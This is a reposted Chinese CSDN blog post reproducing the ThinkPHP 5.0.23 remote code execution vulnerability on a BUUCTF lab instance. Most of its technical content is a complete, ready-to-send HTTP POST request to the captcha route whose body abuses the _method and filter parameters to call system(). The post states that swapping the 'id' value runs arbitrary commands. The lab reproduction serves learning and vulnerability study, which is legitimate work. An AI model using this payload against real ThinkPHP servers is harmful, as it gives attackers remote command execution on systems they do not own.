打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
(2条消息) [ThinkPHP]5.0.23-Rce 漏洞复现_satasun的博客-CSDN博客

[ThinkPHP]5.0.23-Rce

环境搭建

github传送门

BUU传送门

POC

老懒狗选择直接buu,链接

http://node3.buuoj.cn:27512/

1

直接用poc打一下:

POST /index.php?s=captcha HTTP/1.1

Host: node3.buuoj.cn:27512

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

1

2

3

4

5

6

7

8

9

10

11

直接在burp的repeater模块里面构造就行了:

exp

这里直接修改id即可,id处可以执行任意代码。

————————————————

版权声明:本文为CSDN博主「imbia」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。

原文链接:https://blog.csdn.net/satasun/article/details/110818672

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
徒弟博客集合
Arduino常用库集合
将博客搬至CSDN
python 爬取 CSDN 用户粉丝总数、粉丝用户名、昵称和粉丝ID
「博客之星」评选,诚信的互投啊,留链定回
小组成员个人博客链接
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服